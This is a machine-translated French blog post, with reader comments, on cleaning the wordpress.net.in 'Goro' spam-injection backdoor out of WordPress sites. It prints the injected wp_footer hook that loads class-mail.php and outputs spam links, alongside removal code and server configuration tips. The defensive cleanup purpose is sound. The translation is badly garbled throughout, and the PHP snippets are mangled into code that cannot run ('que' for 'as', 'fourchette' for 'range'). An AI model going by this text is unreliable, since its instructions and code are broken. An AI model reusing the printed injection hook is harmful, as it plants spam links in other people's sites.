J'ai trouvé cet lors de la navigation WordPress forum de support, certaines de ces victimes de leur mise à jour et télécharger default_filters.php classe-mail.php l'intérieur de leur WordPress sans être conscient que c'est une porte dérobée (wordpress.net.in). Il n'y a pas de classe-mail.php dans WordPress exception de la classe-phpmailer.php. Il ne faut donc pas confondre obtenir par elle. Ci-dessous est une solution rapide sur la façon dont vous pouvez supprimé la délinquance Goro spamware injection avant que Google vous a interdit l'Internet à partir de tuyaux.
Contournement
- Temporaire pour désactiver à distance les paramètres dans le fichier php.ini.
;;;;;;;;;;;;;;;;;; ; Fopen wrappers; ;;;;;;;;;;;;;;;;;; ; Que ce soit pour permettre le traitement de l'URL (comme http:// ou ftp://) en tant que fichiers. allow_url_fopen = off allow_url_include = off
- Vérifiez votre. Htaccess pour rediriger suspectes.
- Trouvez-classe mail.php intérieur "* / wp-includes /" répertoire et enlevé.
- Trouvez le code suivant dans "* / wp-includes/default_filters.php" et supprimé
add_action ( 'wp_footer', 'wpc7c16b8466d864eeefd20050625c7775'); wpc7c16 fonction <> b8466d864eeefd20050625c7775 () ( @ include ( '. / wp-includes / class-mail.php'); if (sizeof ($ wparr)> 0) ( echo "! div id = \" Goro \ "!"; foreach ($ wparr que $ k => $ v) ( echo "". ucwords ($ v [ 'clé'])." \ n "; if ($ i ==$ inum) break; ) echo "! / div !".$_ pied de page; ) )
Robots.txt
Facultatif - Empêcher l'indexation Googlebot de la page statique spam.
Vous devez vous connecter pour Wordpress Admin> Gérer> Fichiers> Autres fichiers → clés dans "robots.txt". Ajoutez le code suivant.User-agent: Googlebot Disallow: / *? * Disallow: / *?
Reportez le fichier robots.txt.
WordPress classe possible (suspect) qui serait tempéré
Somme de contrôle MD5 les fichiers suivants, le comparer avec les versions officielles de WordPress Archives de sortie.
Les méthodes ci-dessus ne handicapés et supprimer les spams liens, il n'y a pas de garantie qu'il vous protégé de la vulnérabilité. Backup (ou à l'exportation en utilisant votre poste WordPress eXtended RSS-WRX) et d'effectuer une mise à jour.
- 13 déc 2007
Je viens d'avis récemment. Vous aurez besoin de vérifier votre site-tête HTTP. La plupart des sites ne détournent pas de réponse correcte Etat-tête HTTP (400 <> 500). Je suppose qu'ils ont fait à ce manteau d'être explorer par moteur de recherche des araignées. Si vous aviez nettoyé tous les fichiers infectés de votre tête et ne pas répondre correctement obtenir un rookit scanner.
Vérifiez votre site Web statut tête, essayez de masquer votre navigateur (UA) en tant que moteur de recherche à chenilles. La capture d'écran suivante vous montrera comment configurer ce à Web-sniffer.net.

Cette méthode mai ne fonctionnera pas si les scripts utilisés masquage IP de base de suivi. Donc, essayer sur différents chaîne agent utilisateur (c'est-à-dire: inoktomi, AskJeeves, ia_archiver).
Le navigateur Firefox
Vous pouvez également remplacer votre chaîne de useragent ↓ avec firefox.
about: config → general.useragent.overide = 'ua cordes "
Wordpress.net.in Backdoor
Wordpress.net.in Doorway
24 déc 2007 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Fichiers
dans wp-includes répertoire.
- compat.php - (remplacer par la dernière version)
- classe-mail.php supprimer
scan & backdoor supprime tous les fichiers et créer un fichier. htaccess dans wp-includes & wp-content/plugins. Ensuite, ajoutez le code suivant à la liste des répertoires handicapés (prévenir la fuite d'informations et de recherche de l'index).
Options-IndexesWordpress.net.in nouveau partenaire
23 février 2008, nous avons trouvé une signature similaire à wordpress.net.in comme qwetro.com (Allemagne). Probablement de la même attaquant avec différentes ordre du jour.
supprime malveillant create_function wp_head filtres
Ce sont des correctifs pour les spams wordpress.net.in tête d'injection.
/ ** * Suppression de create_function action crochet * Ajouter sur wordpress wp_head filtres * * @ Author Avice De'véreux <ck@kaizeku.com> * @ Copyright Copyright (c) 2006 Avice De'véreux * @ Version 1.0 * @ Http://www.gnu.org/licenses/lgpl.html license GNU Lesser General Public License * @ Link http://blog.kaizeku.com/wordpress/goro-spam-injection-wp-head-patch/ * / remove_create_function_action fonction () (Global $ wp_filter; action_ref $ = 'wp_head'; $ filtre = $ wp_filter [$ action_ref]; _lambda $ = array (); foreach (fourchette (1,10) $ comme priorité) ( if (isset ($ filtre [$ rang])) ( foreach ($ filtre [$ rang] de dollars registered_filter) ( $ callback = (string) $ registered_filter [ 'fonction']; if (preg_match ( "/ lambda /", $ callback)) ( _lambda $ [$ rang] [] = $ callback; ) ) ) ) if (count ($ _lambda)> = 0) ( foreach ($ $ _lambda comme priorité => $ callback) ( if (has_filter (action_ref $, $ callback)) ( remove_filter (action_ref $, $ callback, priorité $, 1); ) ) ) ) add_action ( «init», «remove_create_function_action ');
Le plugin peut être téléchargé à l'interdiction des mines Kaizeku, Goro spam injection fixe
Postes liés à
- Bluehost HostMonster chef de la direction du Blog piraté (wordpress.net.in)
- Matt Heaton bluehost Hostmonster chef de la direction du nouveau piraté - Strike II
Liens externes
- Websniffer avis de requête HTTP et en-tête de réponse
- Wordpress forum de support
- National Vulnerability Database Wordpress 2.0> 2.0.6
URL court
- Temporaire pour désactiver à distance les paramètres dans le fichier php.ini.
- 30 novembre 2007 à 9:06 am
- 24 juin 2008 à 3:55 pm
- 0.3
- url
22 réponses à "Comment faire pour supprimer les spams wordpress.net.in"
URL de trackback: Utilisez l'URL TrackBack de ping ↑ cet article. Si votre blog ne supporte pas les trackbacks, vous pouvez laisser un commentaire lieu.- Lien permanent
Co-fondateur du projet Mozilla WordPress Blog du piraté ...
Blake Ross, le co-fondateur du projet Mozilla WordPress Blog piraté par la Wordpress.net.in blackhat spammeur.
......- 1 trackback (s) þ blog.kaizeku.com sur WordPress 2.3.3
- Lien permanent
[...] Na enak problème, distribuée o? Itno JIH je zelo malo rešilo VSE skupaj. Ampak Google dela? Udeze: Comment Spam Wordpress.net.in Radiation d'injection infectés par le "Goro" Spam-classe mail.php Backdoor Dans rešitev je [...]
- 1 pingback (s) þ www.had.si sur WordPress 2.1.3
- Lien permanent
[...] J'ai trouver quelques informations utiles sur la façon de nettoyer le gâchis que Kakkoi: Comment Spam Wordpress.net.in Radiation d'injection. [...]
- 1 pingback (s) þ www.mattiouz.com sur WordPress 2.3.1
- Lien permanent
[...] Wordpress.net.in a révélé un certain nombre de pages, y compris une entrée de blog par Avice De'vereux qui décrit les symptômes et ont dit qu'ils ont été causés par une injection de spam détourner par [...]
- 1 pingback (s) þ gordon.dewis.ca sur WordPress 2.3.2
- Lien permanent
[...] Est ce que Gordon Dewis la découverte: avec Google wordpress.net.in a révélé un certain nombre de pages, y compris une entrée de blog par Avice De'vereux qui décrit les symptômes et ont dit qu'ils ont été causés par un spam par injection détourner [.. .]
- 1 pingback (s) þ jcheng.wordpress.com sur WordPress MU
- Lien permanent
[...] M'amène à Avice est parfaitement merveilleux poste de sauvetage, où elle charge la façon de supprimer [...]
- 1 pingback (s) þ www.domainersgazette.com sur WordPress 2.1.2
- Lien permanent
[...] En est alle gehackte code trouvés. Mocht je dernière hebben van de div id = "Goro" hack Kijk dan eens ici pour Handige conseils voor het verwijderen. Alhoewel voorlopig ik geen PC klusjes zou doen gaan nous Toch [...]
- 1 pingback (s) þ www.desmeetsjes.nl sur WordPress 2.0.3
- Lien permanent
[...] Connexes: blogs prendre la scène pour les marketers et pour Google Comment faire pour supprimer Wordpress.net.in spam injection [...]
- 2 pingback (s) þ blog.cre8asite.net sur WordPress 2.3.3
- Lien permanent
[...] Peut aller ici pour apprendre la manière d'éliminer le spam [...]
- 1 pingback (s) þ marketingeasy.net sur WordPress 2.3.2
- Lien permanent
[...] Il te maken avait rencontré spam détournement par injection wordpress.net.in. Plus d'infos sur Le problème kan je Vinden hier. De eenvoudigste oplossing voor het problème, est une nouvelle versie van wordpress erop [...]
- 1 pingback (s) þ 2ourallies.org sur WordPress 2.3
- Lien permanent
[...] Un grand écrire de la façon de nettoyer ce gâchis en place peuvent être trouvées ici. [...]
- 1 pingback (s) þ thesnarky.com sur WordPress 2.0.5

Je me suis piraté, les mines a été de liens spam
donaldsensing.com: 6666
Je ne suis pas sûr de qui est "alxumuk" vrai nom, mais il est un éditeur de DMOZ avec des nom d'affichage.
Manque de ressources
ATM je ne dispose que de quelques matières premières accesslog de Murray's blog et le blog de Jens. Matt Heaton jamais de réponses.
J'espère que M. Goro a négligente et de montrer son empreinte, j'ai besoin de plus d'un accès brut journal. L'envoyer à mon e-mail
Si fueran tan amables en ayudarme limpiar un fichier infectados los cuales bastantaes fils, es su programa aprenderlo intéressant mais sans soja Experta en esto.
Me podrian aider en los esto se agradeceria enormemente.
gracias
Sincèrement
Patricia
Il ya deux version de Goro spams.
stil si u cant supprimer les spams lien essayez de la modifier thème> header.php et le thème> footer.php et trouver comment-out »wp_head () 'et' wp_footer () 'à titre temporaire (ce sera tout aussi handicapés et plugins widget qui dépendent sur ce crochet) ..
Вот это да ... По-моему, минусы намного превосходят плюсы. Думаю, не стоит заморачиваться.